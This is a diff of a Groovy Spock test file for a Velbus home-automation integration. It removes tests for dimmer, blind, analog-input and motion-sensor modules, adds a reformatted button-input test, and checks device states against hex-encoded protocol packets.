-            assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert !device.getPropertyValue("CH1_LOCKED")
-            assert !device.getPropertyValue("CH2_LOCKED")
-            assert !device.getPropertyValue("CH3_LOCKED")
-            assert !device.getPropertyValue("CH4_LOCKED")
-            assert !device.getPropertyValue("CH1_INHIBITED")
-            assert !device.getPropertyValue("CH2_INHIBITED")
-            assert !device.getPropertyValue("CH3_INHIBITED")
-            assert !device.getPropertyValue("CH4_INHIBITED")
-            assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH1_LEVEL") == 0d
-            assert device.getPropertyValue("CH2_LEVEL") == 0d
-            assert device.getPropertyValue("CH3_LEVEL") == 0d
-            assert device.getPropertyValue("CH4_LEVEL") == 0d
-        }
-
-        when: "a dimmer channel is switched on"
-        device.writeProperty("CH4", true)
-
-        then: "the dimmer should be on 100%"
-        conditions.eventually {
-            assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH4_LEVEL") == 100d
-            assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.ON
-        }
-
-        when: "the dimmer is switched off"
-        device.writeProperty("CH4", false)
-
-        then: "the dimmer should be off"
-        conditions.eventually {
-            assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a dimmer channel is set to 50%"
-        device.writeProperty("CH4_LEVEL", 50d)
-
-        then: "the dimmer should be on 50%"
-        conditions.eventually {
-            assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH4_LEVEL") == 50d
-            assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.ON
-        }
-
-        when: "the dimmer is switched off"
-        device.writeProperty("CH4", false)
-
-        then: "the dimmer should be off"
-        conditions.eventually {
-            assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH4_LEVEL") == 0d
-            assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a dimmer channel is set to last"
-        device.writeProperty("CH4", AnalogOutputProcessor.ChannelState.LAST.name())
-
-        then: "the dimer should go to 50%"
-        conditions.eventually {
-            assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH4_LEVEL") == 50d
-            assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.ON
-        }
-
-        when: "the dimmer is switched off again"
-        device.writeProperty("CH4", false)
-
-        then: "the dimmer should be off"
-        conditions.eventually {
-            assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH4_LEVEL") == 0d
-            assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a dimmer is set to 75% over 7s"
-        device.writeProperty("CH2_LEVEL_AND_SPEED", "75:7")
-
-        then: "the dimmer should reach 75% after 7s"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.ON
-            assert device.getPropertyValue("CH2_LEVEL") == 75d
-        }
-
-        when: "the dimmer is switched off again"
-        device.writeProperty("CH2", false)
-
-        then: "the dimmer should be off"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_LEVEL") == 0d
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a dimmer is switched on for 3s"
-        device.writeProperty("CH2_ON", 3)
-
-        then: "the dimmer should switch on"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.FAST
-        }
-
-        and: "eventually the message queue should become empty"
-        conditions.eventually {
-            assert network.messageQueue.size() == 0
-        }
-
-        then: "the dimmer should switch off again"
-        if (network.client == messageProcessor) {
-            messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 BB 04 00 00 02 00 38 04 00 00 00 00"))
-            messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 02 00 00 00 00 00 00 79 04"))
-        }
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_LEVEL") == 0d
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a dimmer is set to 50% over 60s"
-        device.writeProperty("CH2_LEVEL_AND_SPEED", "50:60")
-
-        then: "the dimmer should start ramping up"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.FAST
-        }
-
-        when: "we cancel the current dimming operation"
-        device.writeProperty("CH2_LEVEL", -1d)
-
-        then: "the dimmer level should be somewhere between 0-50% and be on"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.ON
-            def dimLevel = device.getPropertyValue("CH2_LEVEL")
-            assert dimLevel > 0 && dimLevel < 50
-        }
-
-        when: "a dimmer is inhibited for 1s"
-        device.writeProperty("CH3_INHIBIT", 1d)
-
-        then: "the dimmer should be inhibited"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.INHIBITED
-        }
-
-        and: "the dimmer should return to normal after 1s"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a dimmer is inhibited indefinitely"
-        device.writeProperty("CH3_INHIBIT", -1d)
-
-        then: "the dimmer should be inhibited"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.INHIBITED
-        }
-
-        when: "the dimmer inhibit is cancelled"
-        device.writeProperty("CH3_INHIBIT", 0d)
-
-        then: "the dimmer should return to normal"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a dimmer is forced on for 5s"
-        device.writeProperty("CH3_FORCE_ON", 5d)
-
-        then: "the dimmer should be on"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.FORCED
-            assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.ON
-            assert device.getPropertyValue("CH3_LEVEL") == 100
-        }
-
-        and: "the dimmer should switch off again"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 BB 04 00 00 04 00 36 04 00 00 00 00"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"))
-
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH3_LEVEL") == 0
-        }
-
-        when: "a dimmer is locked for 1s"
-        device.writeProperty("CH3_LOCK", 1d)
-
-        then: "the dimmer should be off and locked"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
-            assert device.getPropertyValue("CH3_LOCKED")
-            assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH3_LEVEL") == 0
-        }
-
-        and: "the dimmer should return to normal"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH3_LEVEL") == 0
-        }
-
-        when: "a dimmer is switched on indefinitely"
-        device.writeProperty("CH3_ON", -1d)
-
-        then: "the dimmer should be on and in normal state"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.ON
-        }
-
-        when: "we cancel the on timer"
-        device.writeProperty("CH3_ON", 0d)
-
-        then: "the dimmer should return to off"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a dimmer is locked for 1s"
-        device.writeProperty("CH3_LOCK", 1d)
-
-        then: "the dimmer should be disabled"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
-        }
-
-        and: "the dimmer should return to normal after 1s"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a dimmer is locked indefinitely"
-        device.writeProperty("CH3_LOCK", -1d)
-
-        then: "the dimmer should be locked"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
-        }
-
-        when: "the dimmer lock is cancelled"
-        device.writeProperty("CH3_LOCK", 0d)
-
-        then: "the dimmer should return to normal"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        cleanup: "put the device state back"
-        if (device != null) {
-            device.writeProperty("CH1", false)
-            device.writeProperty("CH2", false)
-            device.writeProperty("CH3", false)
-            device.writeProperty("CH4", false)
-        }
+    then: "the property value should change to PRESSED"
+    conditions.eventually {
+      assert gpodChannel22 == InputProcessor.ChannelState.PRESSED
+      assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.PRESSED
     }
 
-    def "Blind Processor Test"() {
+    when: "the button is released on the device"
+    network.client.onMessageReceived(VelbusPacket.fromString("0F F8 32 04 00 00 20 00 A3 04 00 00 00 00"))
 
-        when: "A device property value consumer is registered for device address 97 (VMB2BLE)"
-        Object blindChannel1State;
-        network.addPropertyValueConsumer(97, "CH1", {
-            newValue -> blindChannel1State = newValue;
-        })
-        VelbusDevice device = network.getDevice(97)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMB2BLE
-            assert device.getBaseAddress() == 97
-        }
-
-        and: "the blind property values should be initialised"
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH1_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-            assert !device.getPropertyValue("CH1_LOCKED")
-            assert !device.getPropertyValue("CH2_LOCKED")
-            assert !device.getPropertyValue("CH1_INHIBITED")
-            assert !device.getPropertyValue("CH2_INHIBITED")
-            assert device.getPropertyValue("CH1_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH1_LED_DOWN") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH1_POSITION") == 0d
-            assert device.getPropertyValue("CH2_POSITION") == 0d
-        }
-
-        when: "a blind channel set to down"
-        device.writeProperty("CH2", true)
-
-        then: "the blind should reach 100%"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.FAST
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.DOWN
-        }
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 64 00 00 32 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_POSITION") == 100d
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "the blind is set to up"
-        device.writeProperty("CH2", false)
-
-        then: "the dimmer should return to 0%"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.FAST
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.UP
-        }
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_POSITION") == 0d
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a blind channel is set to 50%"
-        device.writeProperty("CH2_POSITION", 50d)
-
-        then: "the blind should be at 50%"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.FAST
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.DOWN
-        }
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 32 00 00 64 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_POSITION") == 50d
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "the blind is set to up for 10s"
-        device.writeProperty("CH2_UP", 10d)
-
-        then: "the blind should be up"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.FAST
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.UP
-        }
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 61 04 00 00 04 00 90 04 00 00 00 00"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_POSITION") == 0d
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a blind channel is set to down for 15s"
-        device.writeProperty("CH2_DOWN", 15d)
-
-        then: "the blind should be down"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.FAST
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.DOWN
-        }
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 64 00 00 32 04"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 61 04 00 00 08 00 8C 04 00 00 00 00"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_POSITION") == 100d
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a blind is set to up"
-        device.writeProperty("CH2", false)
-
-        then: "the blind should start moving up"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.FAST
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.UP
-        }
-
-        when: "we cancel the current up operation"
-        device.writeProperty("CH2", null)
-
-        then: "the blind should stop and the position should be somewhere between 100%-0%"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            def position = device.getPropertyValue("CH2_POSITION")
-            assert position < 100 && position > 0
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a blind is inhibited for 1s"
-        device.writeProperty("CH2_INHIBIT", 1d)
-
-        then: "the blind should be inhibited"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.INHIBITED
-        }
-
-        and: "the blind should return to normal after 1s"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a blind is inhibited indefinitely"
-        device.writeProperty("CH2_INHIBIT", -1d)
-
-        then: "the blind should be inhibited"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.INHIBITED
-        }
-
-        when: "the blind inhibit is cancelled"
-        device.writeProperty("CH2_INHIBIT", 0d)
-
-        then: "the blind should return to normal"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a blind is inhibited down indefinitely"
-        device.writeProperty("CH2_INHIBIT_DOWN", -1d)
-
-        then: "the blind should be inhibited from going down"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.INHIBITED_DOWN
-        }
-
-        when: "the blind inhibit is cancelled"
-        device.writeProperty("CH2_INHIBIT", 0d)
-
-        then: "the blind should return to normal"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a blind is forced up for 5s"
-        device.writeProperty("CH2_FORCE_UP", 5d)
-
-        then: "the blind should be up and forced"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.FAST
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.FORCED_UP
-        }
-
-        then: "the blind should return to normal"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 61 04 00 00 04 00 90 04 00 00 00 00"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a blind is locked for 1s"
-        device.writeProperty("CH2_LOCK", 1d)
-
-        then: "the blind should be locked"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.LOCKED
-            assert device.getPropertyValue("CH2_LOCKED")
-        }
-
-        and: "the blind should return to normal"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-            assert !device.getPropertyValue("CH2_LOCKED")
-        }
-
-        when: "a blind is locked indefinitely"
-        device.writeProperty("CH2_LOCK", -1d)
-
-        then: "the blind should be locked"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.LOCKED
-            assert device.getPropertyValue("CH2_LOCKED")
-        }
-
-        when: "the blind lock is cancelled"
-        device.writeProperty("CH2_LOCK", 0d)
-
-        then: "the blind should return to normal"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
-            assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
-            assert !device.getPropertyValue("CH2_LOCKED")
-        }
-
-        cleanup: "put the device state back"
-        if (device != null) {
-            //device.writeProperty("CH1", false)
-            device.writeProperty("CH2", false)
-            device.writeProperty("CH2_LOCK", 0d)
-            device.writeProperty("CH2_INHIBIT_DOWN", 0d)
-            device.writeProperty("CH2_INHIBIT_UP", 0d)
-            device.writeProperty("CH2_FORCE_UP", 0d)
-            device.writeProperty("CH2_FORCE_DOWN", 0d)
-        }
+    then: "the property value should return to RELEASED"
+    conditions.eventually {
+      assert gpodChannel22 == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.RELEASED
     }
 
-    def "Analog Input Processor Test"() {
-
-        when: "A device property value consumer is registered for device address 2 (VMB4AN)"
-        Object ioSensor1;
-        network.addPropertyValueConsumer(2, "SENSOR1", {
-            newValue -> ioSensor1 = newValue;
-        })
-        def device = network.getDevice(2)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMB4AN
-            assert device.getBaseAddress() == 2
-            assert device.getPropertyValue("SENSOR1") == 1097.75
-            assert device.getPropertyValue("SENSOR1_TEXT") == "25.2°C         "
-            assert device.getPropertyValue("SENSOR1_TYPE") == AnalogInputProcessor.SensorType.RESISTANCE
-            assert device.getPropertyValue("SENSOR1_MODE") == AnalogInputProcessor.SensorMode.SAFE
-            assert device.getPropertyValue("SENSOR2"), closeTo(0, 0.0001)
-            assert device.getPropertyValue("SENSOR2_TEXT") == "0Unit          "
-            assert device.getPropertyValue("SENSOR2_TYPE") == AnalogInputProcessor.SensorType.CURRENT
-            assert device.getPropertyValue("SENSOR2_MODE") == AnalogInputProcessor.SensorMode.SAFE
-            assert device.getPropertyValue("SENSOR3"), closeTo(0, 0.0001)
-            assert device.getPropertyValue("SENSOR3_TEXT") == "0Unit          "
-            assert device.getPropertyValue("SENSOR3_TYPE") == AnalogInputProcessor.SensorType.VOLTAGE
-            assert device.getPropertyValue("SENSOR3_MODE") == AnalogInputProcessor.SensorMode.SAFE
-            assert device.getPropertyValue("SENSOR4"), closeTo(0, 0.0001)
-            assert device.getPropertyValue("SENSOR4_TEXT") == "0Unit          "
-            assert device.getPropertyValue("SENSOR4_TYPE") == AnalogInputProcessor.SensorType.VOLTAGE
-            assert device.getPropertyValue("SENSOR4_MODE") == AnalogInputProcessor.SensorMode.SAFE
-        }
-
-        when: "A device property value consumer is registered for device address 254 (VMBMETEO)"
-        Object tempCurrent;
-        network.addPropertyValueConsumer(254, "TEMP_CURRENT", {
-            newValue -> tempCurrent = newValue;
-        })
-        device = network.getDevice(254)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMBMETEO
-            assert device.getBaseAddress() == 254
-        }
-
-        and: "the device property values should be initialised"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_CURRENT") == 22.2
-            assert device.getPropertyValue("TEMP_MIN") == -0.6
-            assert device.getPropertyValue("TEMP_MAX") == 43.9
-            assert device.getPropertyValue("RAINFALL") == 0d
-            assert device.getPropertyValue("LIGHT") == 13797d
-            assert device.getPropertyValue("WIND") == 0d
-            assert device.getPropertyValue("CH1") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.PRESSED
-            assert device.getPropertyValue("CH3") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH4") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH5") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH6") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH7") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH8") == InputProcessor.ChannelState.RELEASED
-        }
+    and: "eventually the message queue should become empty"
+    conditions.eventually {
+      assert network.messageQueue.size() == 0
     }
 
-    def "VMBPIRO Test"() {
+    when: "a button press is written to the device"
+    messageProcessor.sentMessages.clear()
+    network.writeProperty(48, "CH22", InputProcessor.ChannelState.PRESSED.name())
 
-        when: "A device property value consumer is registered for device address 8 (VMBPIRO)"
-        Object tempCurrent;
-        network.addPropertyValueConsumer(8, "TEMP_CURRENT", {
-            newValue -> tempCurrent = newValue;
-        })
-        VelbusDevice device = network.getDevice(8)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMBPIRO
-            assert device.getBaseAddress() == 8
-        }
-
-        and: "the device property values should be initialised"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_CURRENT") == 29.6
-            assert device.getPropertyValue("TEMP_MIN") == 20.0
-            assert device.getPropertyValue("TEMP_MAX") == 29.7
-            assert device.getPropertyValue("CH1") == InputProcessor.ChannelState.RELEASED
